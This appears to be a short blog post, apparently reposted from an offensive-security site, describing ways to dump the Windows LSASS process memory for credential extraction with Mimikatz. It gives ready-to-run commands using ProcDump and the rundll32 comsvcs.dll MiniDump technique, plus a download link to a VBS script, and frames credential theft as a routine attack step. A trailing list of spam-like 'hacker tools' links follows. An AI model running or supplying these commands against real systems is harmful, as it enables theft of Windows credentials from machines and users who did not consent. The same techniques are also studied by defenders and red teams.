Tuesday, April 14, 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related news


  1. Hack Tools For Mac
  2. Pentest Reporting Tools
  3. Hack Tools Online
  4. Hacking Tools Usb
  5. Hacker Tool Kit
  6. Hacker Tools List
  7. Hacker Tools Linux
  8. Hacking Tools For Windows 7
  9. Tools Used For Hacking
  10. Hacker Tools
  11. Hacking Tools Windows 10
  12. Pentest Tools List
  13. Hacking Tools For Games
  14. Hack Tools For Pc
  15. Pentest Tools Find Subdomains
  16. Hacker Search Tools
  17. Hacker Tools For Pc
  18. Hacking Tools For Games
  19. Ethical Hacker Tools
  20. Hacker Tools Apk
  21. Easy Hack Tools
  22. Hacker Tools For Mac
  23. Hack Website Online Tool
  24. Hacking Tools 2019
  25. Hacker Tools Free Download
  26. Usb Pentest Tools
  27. Hacker Tools Mac
  28. Hacker Tools Mac
  29. Hack Tools Github
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)